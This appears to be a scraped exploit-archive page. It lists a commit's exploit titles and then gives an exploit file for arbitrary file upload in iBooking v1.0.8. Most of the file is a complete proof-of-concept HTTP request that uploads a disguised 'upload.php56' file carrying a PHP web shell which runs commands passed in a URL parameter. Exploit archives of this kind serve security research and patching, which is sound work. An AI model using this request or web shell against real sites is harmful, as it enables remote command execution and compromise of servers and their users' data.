6bc7a6f9b0
25 changes to exploits/shellcodes/ghdb ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS) Tapo C310 RTSP server v1.3.0 - Unauthorised Video Stream Access ZKTeco ZEM/ZMM 8.88 - Missing Authentication Hashicorp Consul v1.0 - Remote Command Execution (RCE) X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF) OPSWAT Metadefender Core - Privilege Escalation Pega Platform 8.1.0 - Remote Code Execution (RCE) Beauty-salon v1.0 - Remote Code Execution (RCE) BoxBilling<=4.22.1.5 - Remote Code Execution (RCE) iBooking v1.0.8 - Arbitrary File Upload Jetpack 11.4 - Cross Site Scripting (XSS) Moodle LMS 4.0 - Cross-Site Scripting (XSS) Online shopping system advanced 1.0 - Multiple Vulnerabilities rukovoditel 3.2.1 - Cross-Site Scripting (XSS) Senayan Library Management System v9.5.0 - SQL Injection Social-Share-Buttons v2.2.3 - SQL Injection Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS) YouPHPTube<= 7.8 - Multiple Vulnerabilities Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF) SuperMailer v11.20 - Buffer overflow DoS Tunnel Interface Driver - Denial of Service VMware Workstation 15 Pro - Denial of Service HDD Health 4.2.0.112 - 'HDDHealth' Unquoted Service Path SugarSync 4.1.3 - 'SugarSync Service' Unquoted Service Path
41 lines
No EOL
1.5 KiB
Text
41 lines
No EOL
1.5 KiB
Text
# Exploit Title: iBooking v1.0.8 - Arbitrary File Upload
|
|
# Exploit Author: d1z1n370/oPty
|
|
# Date: 01/11/2022
|
|
# Vendor Homepage: https://codecanyon.net/item/ibooking-laravel-booking-system/30362088
|
|
# Tested on: Linux
|
|
# Version: 1.0.8
|
|
|
|
# Exploit Description:
|
|
The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands.
|
|
|
|
|
|
# PoC request
|
|
|
|
POST https://localhost/dashboard/upload-new-media HTTP/1.1
|
|
Host: localhost
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/108.0
|
|
Accept: */*
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Referer: https://localhost/dashboard/settings
|
|
X-Requested-With: XMLHttpRequest
|
|
Content-Type: multipart/form-data; boundary=---------------------------115904534120015298741783774062
|
|
Content-Length: 449
|
|
Connection: close
|
|
Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c
|
|
|
|
-----------------------------115904534120015298741783774062
|
|
Content-Disposition: form-data; name="_token"
|
|
|
|
kVTpp66poSLeJVYgb1sM6F7KIzQV2hbVfQLaUEEW
|
|
-----------------------------115904534120015298741783774062
|
|
Content-Disposition: form-data; name="is_modal"
|
|
|
|
1
|
|
-----------------------------115904534120015298741783774062
|
|
Content-Disposition: form-data; name="file"; filename="upload.php56"
|
|
Content-Type: image/gif
|
|
|
|
GIF89a;
|
|
<?php system($_GET['a']); phpinfo(); ?>
|
|
-----------------------------115904534120015298741783774062-- |